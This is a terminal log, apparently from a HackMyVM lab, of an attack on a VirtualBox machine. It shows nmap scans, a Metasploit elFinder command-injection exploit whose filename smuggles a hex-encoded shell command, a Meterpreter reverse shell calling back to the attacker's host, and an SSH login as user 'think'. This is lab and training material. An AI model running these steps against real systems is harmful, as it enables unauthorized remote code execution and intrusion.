⚡ root@kali ~/Desktop/test/test nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 03:21 EST Nmap scan report for192.168.56.1 Host is up (0.00069s latency). MAC Address: 0A:00:27:00:00:09 (Unknown) Nmap scan report for192.168.56.2 Host is up (0.00044s latency). MAC Address: 08:00:27:D5:61:82 (Oracle VirtualBox virtual NIC) Nmap scan report for www.smol.hmv (192.168.56.16) Host is up (0.00051s latency). MAC Address: 08:00:27:E7:07:A1 (Oracle VirtualBox virtual NIC) Nmap scan report for192.168.56.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in15.08 seconds
1 2 3 4 5 6 7 8 9 10 11
⚡ root@kali ~/Desktop/test/test nmap -sT -min-rate 10000 -p- 192.168.56.16 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 03:26 EST Nmap scan report for www.smol.hmv (192.168.56.16) Host is up (0.00051s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:E7:07:A1 (Oracle VirtualBox virtual NIC)
⚡ root@kali ~/Desktop/test/test nmap -sT -A -T4 -O -p 22,80192.168.56.16 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 03:26 EST Nmap scan report for www.smol.hmv (192.168.56.16) Host is up (0.00053s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 307244:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA) | 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA) |_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://lookup.hmv |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:E7:07:A1 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1openand1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 10.53 ms www.smol.hmv (192.168.56.16)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in8.37 seconds
Interact with a module by name or index. For example info 4, use 4or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 > use 4 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > options
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of formattype:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /elFinder/ yes The base path to elFinder VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.56.4 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Auto
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 192.168.56.16 rhosts => 192.168.56.16 msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set vhost files.lookup.hmv vhost => files.lookup.hmv msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.56.4:4444 [*] Uploading payload 'adB6JwtTYi.jpg;echo 6370202e2e2f66696c65732f616442364a77745459692e6a70672a6563686f2a202e5a5258637867743064302e706870 |xxd -r -p |sh& #.jpg' (1953bytes) [*] Triggering vulnerability via image rotation ... [*] Executing payload (/elFinder/php/.ZRXcxgt0d0.php) ... [*] Sending stage (40004bytes) to 192.168.56.16 [+] Deleted .ZRXcxgt0d0.php [*] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.16:39778) at 2025-02-21 04:45:57 -0500 [*] No reply [*] Removing uploaded file ... [+] Deleted uploaded file
⚡ root@kali ~/Desktop/test/lookup ssh think@192.168.56.16 think@192.168.56.16's password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri 21 Feb 2025 06:16:13 PM UTC System load: 0.0 Processes: 201 Usage of /: 60.4% of 9.75GB Users logged in: 0 Memory usage: 39% IPv4 address for enp0s17: 192.168.56.16 Swap usage: 0% * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge Expanded Security Maintenance for Applications is not enabled. 7 updates can be applied immediately. To see these additional updates run: apt list --upgradable Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Jan 11 20:17:32 2024 from 192.168.1.13 think@lookup:~$